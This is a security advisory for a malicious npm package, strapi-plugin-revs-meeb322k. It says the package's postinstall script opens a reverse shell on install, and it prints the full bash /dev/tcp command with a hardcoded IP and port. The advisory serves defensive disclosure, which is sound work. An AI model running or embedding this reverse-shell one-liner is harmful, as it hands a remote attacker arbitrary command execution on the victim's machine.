MAL-2026-16184
Malicious code in strapi-plugin-revs-meeb322k (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d76370f1e289c374fef3b0cea33d2c21fcaa09e7937ecf6d8ba6386916225878) strapi-plugin-revs-meeb322k@3.6.8 ships a postinstall.js registered as scripts.postinstall in package.json. On `npm install`, the script runs child_process.exec of `bash -c 'bash -i > /dev/tcp/14.225.210.85/443 0>&1 2>&1'`, opening an interactive reverse shell from the installer's machine to the hardcoded remote endpoint 14.225.210.85:443 and giving the operator of that endpoint arbitrary command execution on the installer.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for strapi-plugin-revs-meeb322k (npm). Pin to a known-safe version or switch to an alternative.